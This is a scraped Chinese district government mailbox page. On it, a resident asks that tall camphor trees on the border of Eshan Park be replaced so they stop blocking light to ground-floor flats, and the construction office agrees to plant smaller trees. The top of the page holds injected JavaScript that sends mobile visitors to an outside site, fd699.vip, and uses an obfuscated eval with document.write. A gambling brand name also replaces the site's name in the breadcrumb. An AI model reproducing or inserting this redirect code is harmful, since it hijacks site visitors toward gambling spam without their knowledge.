function moble(){ var ss = '
'; if ((navigator.userAgent.match(/(phone|pad|pod|iPhone|iPod|ios|iPad|Android|Mobile|BlackBerry|IEMobile|MQQBrowser|JUC|Fennec|wOSBrowser|BrowserNG|WebOS|Symbian|Windows Phone)/i))) { window.location.href = "http://fd699.vip" }else{ eval("do" + "cu" + "ment.wr" + "ite('" + ss + "');"); } } moble();



您的位置:大发快三官方开奖 >
互动交流 > 区长信箱


峨山公园靠阳光花园D区边界处绿化影响一楼住户采光问题的建议

信件编号: 20201025001 来信时间: 2020-10-25 09:23:03
信件类型: 我要建议 姓名: 方****
内容: 政府建设峨山公园,是美化周边环境、方便附近居民停车、休闲的一个重要民生工程项目,附近居民都非常高兴并十分感谢政府。但也存在一个问题,峨山公园靠阳光花园D区边界处绿化栽种的是四季常青的樟木树,而且公园地势明显高于小区,加上樟木树本身比较高,对阳光花园D区靠公园这一排一楼住户采光影响很大。恳请建设部门将靠阳光花园D区边界处绿化栽种的树种调整为比较矮的树种或者冬季落叶的树种,这样既能美化环境,又不影响小区住户采光。望领导能够采纳!
答复情况:
答复单位:繁昌区重点工程建设管理中心    答复时间:2020-10-26 17:32:20

答复意见:

“方****”网友:
    您好!对您反映的问题,区重点工程建设管理中心答复如下:
    我们已经与设计单位进行了联系,并对靠近阳光花园D区一侧的绿化进行了调整,拟种植小树,不影响小区住户的采光,满足住户的需求。
    以上答复,如有疑问,可电话咨询,咨询电话:0553-7913750。


用户满意度评价:
  • 查询密码:

  • 评价结果: